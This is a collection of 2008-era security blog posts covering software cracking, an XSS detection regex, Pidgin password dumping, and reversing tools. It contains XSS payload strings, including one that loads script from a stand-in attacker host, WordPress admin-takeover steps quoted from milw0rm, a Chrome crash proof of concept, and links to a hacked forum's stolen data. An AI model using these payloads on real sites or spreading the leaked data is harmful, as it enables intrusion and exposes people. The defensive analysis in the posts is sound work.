Checksums (MD5)
Just a few minutes ago I finished implementing checksums for all the files and texts offered on Wired-Security. To the right of everything you can download you will find the text "[checksum]"; hovering over it with the mouse shows the MD5 hash of that file. It is realized with CSS only, so there is no need for JavaScript to be enabled! Keep in mind what such a hash can and cannot do: it lets you detect a corrupted or truncated download, but MD5 is no longer collision resistant, and a hash published on the same server as the file does not protect you from somebody who has replaced both.
Important: If you find a checksum that does not match, please let me know and I will correct it!
Somehow I knew this before...

Reading Milw0rm yesterday I came across a guy from "SecNiche Security" called Aditya K Sood. I looked a bit at his site and found an advisory called "Pidgin IM Client Password Disclosure Vulnerability". It has the following description:
The pidgin client inherits a client-side password disclosure vulnerability. The credentials used to connect to the required service, i.e. username and password, are not encrypted properly. The credentials can be extracted in clear text by dumping the process memory of the live pidgin process when a connection is set up. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user into executing malicious code which would dump the memory of the process "pidgin.exe".
Ehm, yeah... I think I have talked about something similar before... Do you remember [this post]? I said there that it is possible to dump the passwords and buddy lists of the Pidgin instant messenger client without any problems. This is a common problem with instant messengers that have to transfer passwords in cleartext to the chat networks: the client needs the cleartext at connection time, so even if a messenger stores the password in an encrypted form, it is mostly easy to get it anyway. So, well... I talked about this in June, and now somebody wrote about it in September. The only difference: he dumps the process memory of pidgin.exe, that's all. More complex, looks more leet, nothing new! Anyway, that's how it is nowadays. People make a finding and call it their own without checking whether it was disclosed before...
And again: Wired-Security readers knew first!
Automatic EXE Patching

Being somewhat frustrated with patching an executable file manually in a hex editor like the free HxD, byte for byte, I decided to code an application that parses the DIF files generated by the Interactive DisAssembler (IDA), and to give it to you free of charge so you can use it as well. If you only have to patch about six bytes, doing it by hand is simple enough, but for bigger patching efforts you want an application that does it for you. So within two days I coded an application called "EXE PATCHER FOR IDA *.DIF FILES". I guess the name says it all. Here is a screenshot of the application:

Simple as it is: enter the file to patch, the output filename and the name of the DIF file (all files must be in the same directory!). This graphical user interface does nothing else than call a console application called "patch.exe", which takes four arguments: the file to patch, the file to generate, the offset and the byte to write there. The console application is called once for every line the DIF file holds (so don't worry about the windows opening for a fraction of a second).
Finally you get a prompt telling you that all is fine and your EXE has been patched. That's it! The applications (GUI + console) were written with Microsoft Visual C# 2008 Express Edition and have been compiled and tested on the following systems and configurations:
- Windows XP (SP2) Professional with .Net 3.5 (SP1)
- Windows Vista (SP0) Premium with .Net 3.5 (SP0)
The following files have been put into "Releases" -> "Hacking/Cracking":
[EXE_PATCHER_BUILD_1_0_BETA.tar]
-> Includes the compiled executables plus a README.txt
[EXE_PATCHER_GUI.tar]
-> The complete source code of the graphical part of the application
[EXE_PATCHER_CONSOLE.tar]
-> The complete source code of the console part of the application
[EXE_PATCHER_GUI.cs.txt]
-> The main part of the source code for the graphical part of the application
[EXE_PATCHER_CONSOLE.cs.txt]
-> The main part of the source code for the console part of the application
(ReverseMe.)EXE patching

As I said some days ago, I am going deeper into reverse (code) engineering, and it is still a lot of fun and a good challenge that doesn't get boring too fast. On the page [video.reverse-engineering.net] I checked out the first tutorial by TiGa, who is a trial member of the [ARTeam], a reverse engineering group that has been well known for a few years now and has published three e-zines. TiGa shows the same thing Lena151 showed in her first video: how to manipulate the file ReverseMe.exe. The difference is that TiGa uses IDA and Lena151 OllyDbg. That was a good opportunity to compare both programs, and I definitely like IDA more, especially because of its graph view, which you can rearrange to look the way you want and then understand the flow of the reversed program much better (even months later). After watching the video by TiGa, which you can reach here:
http://video.reverse-engineering.net/main.php?g2_view=core.DownloadItem&g2_itemId=428&g2_navId=xc9db2144
(Use this g2_view option, otherwise the video is very small!)
I did everything as explained and then generated a DIF file, which looked like this:
This difference file is created by The Interactive Disassembler

reverseMe.exe
0000067B: 75 EB
000006B0: 75 EB
000006BF: 7C 90
000006C0: 36 90
000006D6: 7C 90
000006D7: 1F 90
Now I wanted to actually PATCH the executable file, so that I can double-click it and the bypass works. I searched for a hex editor and ended up with HxD for the moment, which did its job pretty well. I went to the file offsets 0000067B, 000006B0 and so on and replaced the byte on the left side of each DIF line with the one on the right side, which ended up looking like this:

Finally I saved the file as ReverseMe_CRACKED.exe, started it, and yep: it worked...
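As an added example (not the EXE PATCHER code from the post above, and not part of TiGa's tutorial), here is what the DIF-driven patching of this post and of the "Automatic EXE Patching" post boils down to in Python: parse the DIF format IDA writes (banner line, target file name, then one "OFFSET: OLD NEW" line per byte, OFFSET being a file offset), verify that the OLD bytes really are in the file, and only then write the NEW bytes. The DIF text is the one printed above; the target binary is a constructed stand-in of 0x700 zero bytes carrying the OLD bytes at the right offsets, because reverseMe.exe itself is not on this page. The opcode names are my annotation: 75 is a short jnz, EB a short jmp, 7C a short jl and 90 a nop, so the first two entries make a conditional jump unconditional and the other four turn two jl instructions (opcode plus displacement) into nops.

```python
import re

# Constructed sample: the DIF shown on this page for reverseMe.exe, reproduced verbatim.
SAMPLE_DIF = """This difference file is created by The Interactive Disassembler

reverseMe.exe
0000067B: 75 EB
000006B0: 75 EB
000006BF: 7C 90
000006C0: 36 90
000006D6: 7C 90
000006D7: 1F 90
"""

# One patch entry per line: FILE_OFFSET: OLD NEW (all hexadecimal)
_ENTRY = re.compile(r"^([0-9A-Fa-f]+):\s+([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})$")

# A few x86 opcode bytes, so a patch can be read as code and not only as hex.
_OPCODES = {0x74: "jz rel8", 0x75: "jnz rel8", 0x7C: "jl rel8", 0x7D: "jge rel8",
            0xEB: "jmp rel8", 0x90: "nop"}


def parse_dif(text):
    """Return (target_file_name, [(offset, old_byte, new_byte), ...])."""
    name, patches = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("This difference file"):
            continue
        m = _ENTRY.match(line)
        if m:
            patches.append(tuple(int(g, 16) for g in m.groups()))
        elif name is None:
            name = line          # the first non-entry line names the file the DIF belongs to
        else:
            raise ValueError("unexpected DIF line: %r" % raw)
    return name, patches


def check_dif(data, patches):
    """Return the entries whose OLD byte is not what the file contains (empty = safe to apply)."""
    bad = []
    for off, old, _new in patches:
        found = data[off] if off < len(data) else None
        if found != old:
            bad.append((off, old, found))
    return bad


def apply_dif(data, patches):
    """Return a patched copy of data. Refuses to touch anything if a single OLD byte
    differs: that means the wrong binary, or a file that was already patched."""
    bad = check_dif(data, patches)
    if bad:
        raise ValueError("OLD bytes do not match at offsets: " +
                         ", ".join("%08X" % off for off, _, _ in bad))
    out = bytearray(data)
    for off, _old, new in patches:
        out[off] = new
    return bytes(out)


def explain(patches):
    """Human-readable view of each entry, e.g. '0000067B: 75 (jnz rel8) -> EB (jmp rel8)'.
    Displacement bytes such as the 36 and 1F above are reported as operand/other."""
    def name(b):
        return _OPCODES.get(b, "operand/other")
    return ["%08X: %02X (%s) -> %02X (%s)" % (off, old, name(old), new, name(new))
            for off, old, new in patches]


def patch_file(src_path, dst_path, dif_path):
    """Apply a .dif on disk, writing a new file; returns the number of bytes changed."""
    with open(dif_path) as f:
        _, patches = parse_dif(f.read())
    with open(src_path, "rb") as f:
        data = f.read()
    with open(dst_path, "wb") as f:
        f.write(apply_dif(data, patches))
    return len(patches)


def build_fake_target(size=0x700):
    """Constructed stand-in for reverseMe.exe: a zero-filled buffer carrying the DIF's
    OLD bytes at the right offsets, so the example runs without the real binary."""
    _, patches = parse_dif(SAMPLE_DIF)
    buf = bytearray(size)
    for off, old, _ in patches:
        buf[off] = old
    return bytes(buf)


if __name__ == "__main__":
    target_name, entries = parse_dif(SAMPLE_DIF)
    patched = apply_dif(build_fake_target(), entries)
    print("%s: %d byte(s) patched" % (target_name, len(entries)))
    print("\n".join(explain(entries)))
```

The OLD-byte check is the part a one-byte-at-a-time patcher usually lacks: it catches running the DIF against the wrong build of the executable, and it catches running it twice, since after the first pass the bytes at those offsets are the NEW values.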

Have fun doing it yourself! I am moving on to read the book "REVERSING - Secrets of Reverse Engineering".
Hall of Shame

After several months of having my website connected to the internet, I have seen a lot of attacks. Some of the highlights from my error.log are now online for you to view. Check out "Hall of Shame" -> "Best of error.log". My favourite is definitely this one:
File does not exist: /localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php
Is it funny or sad to see how stupid people have become about computer security and hacking in the last years?! Somebody is blindly requesting the path of a Joomla component that this site never had, hoping for a known hole. Think about it and laugh a lot!
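Requests like the one above are easy to pull out of an Apache error.log automatically. The following is an added example, not something from the Hall of Shame pages: it parses the Apache 2.x error_log format ([date] [error] [client IP] File does not exist: PATH), keeps only the paths that nobody requests by accident, and reports the clients that asked for several of them. The log lines are constructed for the example (the IP addresses are documentation ranges and the paths are mine); only the com_joomla-visites path is the one quoted in the post.

```python
import re
from collections import defaultdict

# Apache 2.x error_log line: [timestamp] [error] [client IP] File does not exist: PATH
LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[0-9a-fA-F.:]+)\] "
    r"File does not exist: (?P<path>\S+)"
)

# Constructed sample log (not the author's error.log).
SAMPLE_LOG = """\
[Sun Sep 14 12:01:02 2008] [error] [client 203.0.113.7] File does not exist: /var/www/html/administrator/components/com_joomla-visites/core/include/myMailer.class.php
[Sun Sep 14 12:01:03 2008] [error] [client 203.0.113.7] File does not exist: /var/www/html/phpmyadmin
[Sun Sep 14 12:01:03 2008] [error] [client 203.0.113.7] File does not exist: /var/www/html/wp-login.php
[Sun Sep 14 12:05:44 2008] [error] [client 198.51.100.2] File does not exist: /var/www/html/favicon.ico
[Sun Sep 14 12:06:10 2008] [error] [client 203.0.113.7] File does not exist: /var/www/html/xmlrpc.php
[Sun Sep 14 12:07:00 2008] [notice] Apache/2.2.9 (Unix) configured -- resuming normal operations
"""

# Path fragments that only somebody scanning for known-vulnerable software asks for
# on a site that does not run that software.
PROBE_MARKERS = ("/administrator/components/", "/phpmyadmin", "/wp-login.php", "/xmlrpc.php")


def parse_errors(text):
    """Yield (ip, path) for every 'File does not exist' line; other lines are skipped."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            yield m.group("ip"), m.group("path")


def probes_by_client(text, markers=PROBE_MARKERS, threshold=2):
    """Return {ip: [paths]} for clients that requested at least `threshold` probe paths.
    A single missing favicon is noise; several admin paths from one address is a scanner."""
    hits = defaultdict(list)
    for ip, path in parse_errors(text):
        if any(marker in path for marker in markers):
            hits[ip].append(path)
    return {ip: paths for ip, paths in hits.items() if len(paths) >= threshold}


if __name__ == "__main__":
    for ip, paths in probes_by_client(SAMPLE_LOG).items():
        print("%s probed %d known paths:" % (ip, len(paths)))
        for p in paths:
            print("   ", p)
```

The marker list is the knob to tune: add the component and admin paths your own error.log shows, and raise the threshold if legitimate crawlers trip it.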
Ruby IDE (RDE) error
Just some short news from my side. While coding a bit in Ruby and trying to write code that parses the options you hand to your Ruby script, I came across an error (bug?) that I was able to reproduce endlessly... The code is the following:
require 'optparse'

OptionParser.new do |foo|
  foo   # typing a DOT after this bare "foo" is what triggers the access violation in RDE
end
If you type a DOT after the second "foo" you might (no guarantee) get an access violation. At least I get it like this:

(RDE 1.1.1.1 on Windows XP Professional SP2)
If someone knows an answer or can reproduce this as well, feel free to tell me... Let's go back to coding and try not to use this type of code anymore!
The hack, that was not one
Everyone has heard the news, I guess, telling you that "Sarah Palin's Yahoo email account has been hacked". Wow, sounds evil! Republicans hacked shortly before the elections. I waited some time before I decided to blog about it because it seemed a bit strange to me, and I was right actually: someone I won't name here told the story that he hacked the account of Sarah Palin and made her data publicly available. But how did he do this? Brute-forcing? No, not even that! Here is the answer that has come to light now:
The "hacker" found the address gov.palin@yahoo.com and then simply used Yahoo's great password reset feature. Yahoo prompts you with three security questions; if you answer them correctly you can reset the password. As Sarah Palin knows a lot about security, she of course used answers that are very hard to guess ("What is my ZIP code?" and so on...). The intruder googled for the answers, found them and got into the account. Security questions whose answers are public record are not a second factor; they are a second password that everybody already knows.
So: The hack, that wasn't one!
Reversing on Mac OS X (Leopard)
In the last days I got deeper and deeper into reversing (reverse engineering) on Mac OS X, and my conclusion so far: it rocks! First I planned to install the IDA Pro 5.2 version for Mac, but that is command line only and seems quite limited. So I checked some tutorials on the internet and found out that running IDA Pro through CrossOver Mac works quite well. It runs quickly and smoothly. Here's a screenshot for you:
Furthermore there are many tools that help you analyze binaries on Mac OS X, if you don't just want to reverse ON the Mac but reverse Mac software itself. Let's take a look at some of them. Of course you can profit a lot from GDB:
[skyout:~]$ gdb
GNU gdb 6.3.50-20050815 (Apple version gdb-962) (Sat Jul 26 08:14:40 UTC 2008)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-apple-darwin".
(gdb) [...]
Another very cool tool is heap, which shows you the malloc zones and the memory a running program has allocated. Let's check what iTunes uses:
[skyout:~]$ heap 488
Process 488: 2 zones
Zone DefaultMallocZone_0xf69000: Overall size: 30427KB; 68512 nodes malloced for 25042KB (82% of capacity); largest unused: [0x1b2a800-4949KB]
Zone unnamed_zone_0xf6c000: Overall size: 1023KB; 1 nodes malloced for 1KB (0% of capacity); largest unused: [0x1100020-1023KB]
All zones: 68513 nodes malloced - 25042KB
[...]
And checking the file system calls made by iTunes:
[skyout:~]$ sudo fs_usage | grep iTunes
[...]
14:39:37 open /dev/random
14:39:37 read
14:39:37 close
14:39:39 RdData[async]
14:39:39 pread
14:39:39 getattrlist /Users/skyout/Library
14:39:39 getattrlist
14:39:39 getattrlist /Users/skyout/Library
14:39:39 getattrlist /Users/skyout/Library/iTunes
14:39:39 getattrlist /Users/skyout/Library/iTunes
14:39:39 getattrlist /Users/skyout/Library/iTunes
14:39:39 getattrlist /Users/skyout/Library/iTunes/Scripts
14:39:39 getattrlist /Users/skyout/Library/iTunes
14:39:39 getattrlist /Library
[...]
And so on... Here is a list of some other tools that might help with analyzing things:
- nm
- file
- lsof
- vmmap
- otool
- lipo
- [...]
This post was not that technical, but I am just at the beginning, so as soon as I learn more you will read more about it. Promised!
Firefox Greasemonkey Worm

WarGame sent me a quick note yesterday about a description Symantec wrote for his Greasemonkey worm, which was released in the combined e-zine of EOF a short time ago.
- [JS.Posmonk by Symantec]
- [WarGame's Blog]
Nice one! Go on that way.
Risky iPhone 2.1 feature

Yesterday I installed the new iPhone firmware 2.1 (and of course jailbroke it with Pwnage 2.1). After the restore with the custom firmware I was able to access the iPhone without typing in any passcode. So far nothing to worry about: set it again and you're done. But I found a nice "feature" that tells you the following:
All data on this iPhone will be deleted after 10 wrong login attempts.
Okay, this "feature" is disabled by default, but if you enable it, anyone with physical access to your iPhone has a nice way to make you go numb. Just imagine you leave your iPhone lying around, someone visits you, plays around with it and guesses your passcode ten times. On the tenth wrong attempt your data is gone... Ouch, that will suck! Such a wipe is only a reasonable trade-off if you have a current backup; without one it turns a guessing attack into a denial of service against yourself.
Fixing a strange bug in Leopard

Just a quick note from my side before I leave the computer for today. I encountered a very strange bug on Mac OS X 10.5 (Leopard) after upgrading to it from 10.4 (Tiger). The following things went wrong:
- The automatic update mechanism did not work anymore
- The Preview application did not work anymore
- Many other applications stopped working properly...
As I had not used my MacBook for quite a while, it wasn't a problem for me. But now I use the MacBook more often, so one night I sat down and searched for explanations and solutions... I found out the following: after the update to Leopard the directory for temporary files was owned by root, which caused the problems described above, because the applications trying to write into the temporary directory were not allowed to do so and stopped working. The solution is simple:
sudo chgrp -R `whoami` "$TMPDIR"
Typing this into the Terminal of Mac OS X solved all my problems... But now my hard disk is full of junk that the applications have written into other locations instead of $TMPDIR... Yeeha, that means a lot of cleaning up next time.
New Hakin9 article by Komarov

Long time without a new article to read. So now you get some new stuff to check out. It is a quite old article by Andrej Komarov, written for the English version of the Polish Hakin9 magazine. The title says it all: "Analysing and Mapping Wireless Networks". You will learn the following things by reading the article:
- WiFi Positioning
- How to make a Wardriver's map
- Common attacks in the wireless infrastructure
You should know the following before reading it:
- Some knowledge on wireless technology
- Basic knowledge on network analyzing
Have fun! You can find the article in "Texts" -> "Attack" or click [here].
Regex until collapse (2)

Even though I know that it won't work perfectly and never will, according to some specialists, I have updated my regular expression another time. Thanks go to Stefan Esser and Veda for helping me a bit and making me realize that it is NOT possible to match 100% of all valid XSS strings and at the same time NOT match 100% of all invalid ones. Nevertheless I updated my regex a bit. Thanks go also to RadiatioN, who triggered the exception that forced me to update it:
preg_match('/^[a-zA-Z0-9\S\s]{0,}(((<script>|
<script [a-zA-Z0-9]{0,}>)alert\(([0-9]+|\"[a-zA-Z0-9\S\s]+\"|
\'[a-zA-Z0-9\S\s]+\'|\"\"|document[a-zA-Z\.]{0,})\)[a-zA-Z0-9\S\s]{0,}
<\/script>)|((<iframe>|<iframe [a-zA-Z0-9\S\s]{0,}>)))
[a-zA-Z0-9\S\s]{0,}$/i', $string)
Besides, Veda pointed me to the number one PHP intrusion detection system, which can be found at [php-ids.org]. So I checked it, did one try with "><iframe111> (which is invalid!), and the [demo] blocked this string as malicious, which it isn't. So even this great project does not solve my problem... Ouch!
Regex until collapse

For the last 15 hours I have done nothing else than write regular expressions, again and again, trying to make a regex that detects EVERY possible valid XSS string and does NOT match ANY invalid XSS string. My conclusion: it is not possible, or you need a lot more time and have to handle the different encoding mechanisms... My solution (so far), which detects a lot of typical XSS strings but can still be tricked, is the following code:
preg_match('/^[a-zA-Z0-9\S\s]{0,}((<script>alert\(
([0-9]+|\"[a-zA-Z0-9\S\s]+\"|\"\"|document[a-zA-Z\.]{0,})\)
[a-zA-Z0-9\S\s]{0,}<\/script>)|(<iframe [a-zA-Z0-9\S\s]{0,}>
[a-zA-Z0-9]{0,}))[a-zA-Z0-9\S\s]{0,}$/i', $string)
I bet in one week I won't understand it anymore... Anyway, it matches a lot of XSS strings perfectly, some examples:
<script>alert("XSS");</script>
<script>alert(1337);</script>
foobar<iframe>foobar</iframe>foobar
foo<script>alert(document.foobar);bar</script><!--
asdasd<iframe sd3424="asdasdasd">472389djkasfan</iframe>asdas<!--
<iframe src="http://google.de" style="height:300px"></iframe>
<script>alert("ööö");</script>
Furthermore it DOESN'T match a lot of invalid strings (which is the point of the regex, of course):
<script>1337alert("XSS");</script>
<script>alert(aaaaa);</script>
<script>alert();</script>
But the filter is not yet perfect (and might never be, because perfection is hard to reach in only a few hours), so you can still fool it, for example with these strings:
<script>alert(" " ");</script>
<iframe>
If/when I update the regex filter, I will write news about it here. Check it out.
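To see what the filter catches and what it lets through, here is the version-2 expression from the post above, transcribed into Python's re module and run against the example strings from both posts. This is an added example, not code from the posts: the vectors under MISSED are constructed by me (they are not the exception RadiatioN reported), and the html.escape comparison at the end is my addition, showing the defence that does not depend on enumerating attack strings.

```python
import html
import re

# The version-2 expression from the post: PHP delimiters dropped, /i becomes re.I.
# [a-zA-Z0-9\S\s] is just "any character, newline included".
XSS_REGEX = re.compile(
    r"^[a-zA-Z0-9\S\s]{0,}("
    r"((<script>|<script [a-zA-Z0-9]{0,}>)alert\(([0-9]+|\"[a-zA-Z0-9\S\s]+\"|"
    r"\'[a-zA-Z0-9\S\s]+\'|\"\"|document[a-zA-Z\.]{0,})\)[a-zA-Z0-9\S\s]{0,}<\/script>)"
    r"|((<iframe>|<iframe [a-zA-Z0-9\S\s]{0,}>))"
    r")[a-zA-Z0-9\S\s]{0,}$",
    re.I,
)

# Test strings taken from the posts.
PAGE_MATCHES = [
    '<script>alert("XSS");</script>',
    "<script>alert(1337);</script>",
    "foobar<iframe>foobar</iframe>foobar",
    "foo<script>alert(document.foobar);bar</script><!--",
    'asdasd<iframe sd3424="asdasdasd">472389djkasfan</iframe>asdas<!--',
    '<iframe src="http://google.de" style="height:300px"></iframe>',
    '<script>alert("ööö");</script>',
]
PAGE_NON_MATCHES = [
    '<script>1337alert("XSS");</script>',
    "<script>alert(aaaaa);</script>",
    "<script>alert();</script>",
]
PAGE_FALSE_POSITIVE = '<script>alert(" " ");</script>'   # not valid JavaScript, still matched

# Constructed vectors (not from the page) that execute script in a browser but contain
# nothing the expression looks for: no <script>alert(...)</script> shape, no <iframe.
MISSED = [
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    '<script type="text/javascript">alert(1)</script>',
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<script src=//attacker.invalid/x.js></script>",
    "<script>alert(/XSS/)</script>",
]


def flagged(s):
    """True if the version-2 regex would reject s."""
    return XSS_REGEX.search(s) is not None


def evaluate():
    """Run the page's own strings and the constructed vectors through the filter."""
    return {
        "page_matches_all_flagged": all(flagged(s) for s in PAGE_MATCHES),
        "page_non_matches_all_passed": not any(flagged(s) for s in PAGE_NON_MATCHES),
        "false_positive_flagged": flagged(PAGE_FALSE_POSITIVE),
        "vectors_that_pass": [s for s in MISSED if not flagged(s)],
    }


def encode_for_html(s):
    """The fix that needs no attack list: escape on output, so the browser sees text,
    never markup. Every string above comes out without a single '<'."""
    return html.escape(s, quote=True)


if __name__ == "__main__":
    for key, value in evaluate().items():
        print(key, value)
    print(encode_for_html(MISSED[0]))
```

The result is the point of the two posts made concrete: the expression does exactly what its examples say, and every vector that does not look like the examples walks straight past it, because a denylist can only reject what its author already thought of. Output encoding (and, for attribute and URL contexts, the matching encoder) needs no such list.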
Nmap 4.75 released

Just came across the news that a new version of Nmap is available with cool new features, so I decided to inform you about it as well, in case you haven't read it somewhere else yet. The version number is now 4.75, and the most interesting new feature is the ability of Nmap to draw a topology map of the scanned network. This feature is only available through the GUI Zenmap, which I tested on Windows but not yet on Mac OS X (I will do that this evening). This is a screenshot of such a map:

(Zenmap + Nmap 4.75)
Furthermore the OS fingerprint database has been updated; some highlights of the new fingerprints:
- iPhone
- Wii
- Linux 2.6.25
- Windows Vista (SP1)
- Mac OS X Darwin 9.2.2
...
What more is there to say? I love Nmap and you will learn to love it too. So check out the [changelog] for further information and finally go to the [download section] to get Nmap 4.75!
DoomRiderz gone, EOF growing

The first one to talk about it was the well-known and hated/loved Peter Ferrie: DoomRiderz is dead! Now it has been made official on the website of the EOF-Project, and when you visit [doomriderz.co.nr] you will see a video taken from YouTube and a message "R.I.P.". That's all. You can visit the old website by going to [old_index.html]. I guess it was only a matter of time until this had to happen; the only really active and stable member was the leader WarGame, who worked together with Necronomikon for quite a while, but he quit back in the beginning of 2008. Some time after the release of the second EOF magazine WarGame went back to that group as a member. Ironically, the second e-zine of EOF was a co-production of RRLF, DR and EOF; none of those groups exists anymore, except the EOF-Project, which is growing at the moment.
The forum of EOF, which can be reached at [vx.eof-project.net], has grown massively in the last months and now has dozens of members, some very active and many very silent. Nevertheless it has become the #1 place to discuss new ideas and present new viruses. At the moment the EOF team itself consists of the following members (taken from authors.html):
- izee: E-mail izee[at]eof-project[dot]net, Blog izee-eof.livejournal.com
- Nibble: E-mail xNibble[at]hotmail[dot]com
- AzRaEL: E-mail crackstaff[at]crackenfind[dot]net, Homepage crackenfind.net and crackergt.net
- Berniee/Fakedminded: E-mail fakedminded[at]cooltoad[dot]com, Homepage vx.org.ua/bernieevx, Blog fakedminded.wordpress.com
- WarGame: E-mail wargame89[at]yahoo[dot]it, Blog vx.org.ua/wargamevx
- Dark Prophet: E-Mail prophet[at]eof-project[dot]net
- tanMa: E-Mail demonyu[at]yahoo[dot]com
Good luck to everyone in the team! I hope they will be active and present some great stuff in the near and far future. Hint: I am working on a new creation as well, but as I am concentrating on other things first, the research and development will start sometime in the first months of 2009. Be prepared.
WP 2.6.1 SQL Column Trunc. Vuln.
Not long ago I talked about a new way to bypass SQL queries and hijack a web application. The technique was found by the well-known PHP security specialist Stefan Esser, who was part of the PHP Security Team for quite a while. He talked about SQL column truncation, and now the proof has arrived: he was right! A guy using the handle irk4z published an exploit on Milw0rm that uses the vulnerability described by Stefan Esser to reset the administrator password of a WordPress installation. The trick: MySQL in its default, non-strict mode silently truncates a string that is too long for a column, and its string comparison ignores trailing spaces, so a second user registered as 'admin', 55 spaces and an 'x' is stored as 'admin' padded with spaces and from then on compares equal to the real 'admin'. Almost every big web application can be considered at risk if the length of user input is not checked before the INSERT. Check out the exploit yourself; reading it says more than a thousand words:
1. go to url: server.com/wp-login.php?action=register
2. register as:
   login: admin x
   email: your email
   ^ admin[55 space chars]x
   now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will be sent to correct admin email ;/
# milw0rm.com [2008-09-07]
The original exploit can be found at [milw0rm.com/exploits/6397].
The article describing this (new) class of vulnerabilities can be found at [suspekt.org].
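The two database behaviours that make step 2 of the exploit work can be modelled without a MySQL server. The following is an added example, not code from the post, from Stefan Esser's article or from the milw0rm exploit: a small Python model of the wp_users table and the registration code around it. Two things are assumed and stated here rather than taken from the page: the user_login column is 60 characters wide (which is why the exploit uses exactly 55 spaces), and the two fixes shown are the ones a practitioner would apply, a strict sql_mode on the database side and a length check before the INSERT on the application side. The truncation rule and the trailing-space comparison are real MySQL behaviour (non-strict sql_mode and PAD SPACE collations); the e-mail addresses are constructed.

```python
USER_LOGIN_WIDTH = 60   # assumed: wp_users.user_login is VARCHAR(60); 5 + 55 spaces fill it exactly


def mysql_store(value, width, strict=False):
    """How MySQL stores a string longer than its VARCHAR(width) column:
    with the classic non-strict sql_mode it truncates silently (only a warning),
    with STRICT_TRANS_TABLES it raises 'Data too long for column'."""
    if len(value) <= width:
        return value
    if strict:
        raise ValueError("Data too long for column")
    return value[:width]


def pad_space_equal(a, b):
    """Comparison under a PAD SPACE collation (the classic MySQL default):
    trailing spaces are ignored, so 'admin' and 'admin     ' are equal."""
    return a.rstrip(" ") == b.rstrip(" ")


class UsersTable:
    """Tiny model of wp_users plus the registration / lookup code around it."""

    def __init__(self, strict=False, enforce_length=False):
        self.rows = []                          # (user_login, user_email)
        self.strict = strict                    # database-side fix
        self.enforce_length = enforce_length    # application-side fix

    def username_exists(self, login):
        # The uniqueness check runs on the *untruncated* value: 'admin' + spaces + 'x'
        # is not equal to 'admin' even under PAD SPACE, because of the trailing 'x'.
        return any(pad_space_equal(row[0], login) for row in self.rows)

    def register(self, login, email):
        if self.enforce_length and len(login) > USER_LOGIN_WIDTH:
            raise ValueError("username too long")
        if self.username_exists(login):
            raise ValueError("username already exists")
        self.rows.append((mysql_store(login, USER_LOGIN_WIDTH, self.strict), email))

    def find_by_login(self, login):
        # The same comparison later, after truncation has cut off the 'x' and left
        # 'admin' padded with spaces: now two rows answer to 'admin'.
        return [row for row in self.rows if pad_space_equal(row[0], login)]


def replay_registration(strict=False, enforce_length=False):
    """Steps 1-2 of the exploit against the model; returns the rows that answer
    to the login 'admin' afterwards (2 means the duplicate account exists)."""
    table = UsersTable(strict=strict, enforce_length=enforce_length)
    table.register("admin", "admin@example.invalid")        # the legitimate admin
    payload = "admin" + " " * 55 + "x"                       # 61 characters, as in the exploit
    try:
        table.register(payload, "attacker@example.invalid")
    except ValueError:
        pass                                                 # rejected: the fix worked
    return table.find_by_login("admin")


if __name__ == "__main__":
    print("default MySQL   :", len(replay_registration()), "row(s) named admin")
    print("strict sql_mode :", len(replay_registration(strict=True)), "row(s) named admin")
    print("length check    :", len(replay_registration(enforce_length=True)), "row(s) named admin")
```

Either fix alone closes the hole in this model, but they fail differently: strict mode turns the second registration into a database error the application has to handle, while the length check rejects it before any query runs and does not depend on how the DBA configured the server.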
Busses in Ulm using Windows (2)
After my first post on this topic, someone sent me an email with some more funny images of Windows systems in Ulm. Have fun!

Want to send an error report to Microsoft?

The good old BSOD.

And even the university in Ulm is using Windows...
Thanks go to David of [datenschrott.de] for these pictures!
Google Chrome exploits out

Wow, that was damn fast! Only a few hours after the release of Google Chrome, the browser developed by Google, the first exploits were out, demonstrating how to hijack the user's system with a little user interaction. Two bugs have been reported so far: the first one can be used to infect the system, the second one makes the browser crash. That is interesting, so let's look a bit deeper.
First off, the denial-of-service bug. The interesting thing about it is that it crashes the whole browser instance, something that shouldn't happen at all according to what Google's developers promised. In their comic about the browser they showed that every tab runs in its own sandboxed process, so one crashing tab shouldn't affect the others. The bug discovered by Rishi Narang (psy.echo) does exactly that: it shuts down the whole browser, and it's really simple. This is the code to do so:
PoC: http://evilfingers.com/advisory/google_chrome_poc.php
---
<a href="EVIL:%">CRASH ME</a>
The second bug is even more fun. It is actually not a problem of Google Chrome itself but of the technology Chrome uses: the browser is built on WebKit, which is also the engine of Apple's Safari, and an older WebKit version had a bug that allowed a "carpet bomb" attack, meaning the attacker could download files to the user's system without any user interaction. Now there are some things to think about. First off, in the original exploit it took the combination of Safari and Internet Explorer on Windows to make the attack dangerous, because the download itself isn't that risky; it became critical when the user surfed with Safari, a DLL got downloaded to the desktop, and the user later used Internet Explorer, which picked up the DLL from the desktop as one of its own libraries. Only then was the exploit successful. In Google Chrome it's slightly different. Same thing: the user visits a website, the browser downloads a file, and then(!) the user clicks the specific button in Chrome's download bar at the bottom of the window, as far as I read. With a little bit of social engineering it shouldn't be hard to make someone visit a website and click that button, so I would consider this a critical threat. Even worse: it wouldn't exist if Google had shipped an up-to-date WebKit... Ouch!
PoC: http://raffon.net/research/google/chrome/carpet.html
Blood and Honour owned

It finally happened: one of the biggest fascist networks worldwide has been hacked by left-wing activists. The network known as Blood&Honour is one of the last really big remaining places for fascists to talk freely about their ideology, share information and plan things. I guess it was only a matter of time until the hackers would find a way into the servers, and last week it happened. Officially this is only a music network, but yeah... guess what the music is for: spreading their ideology and recruiting new people for the movement! The nice thing about the hack: they archived the WHOLE forum and uploaded it to Rapidshare and Megaupload. So you can download the files, extract them and set up a web server on your own machine, browsing through the forum without restrictions. If you want to check it out, here are the links:
http://www.megaupload.com/?d=08K7HVI0
http://www.megaupload.com/?d=XMYS4W63
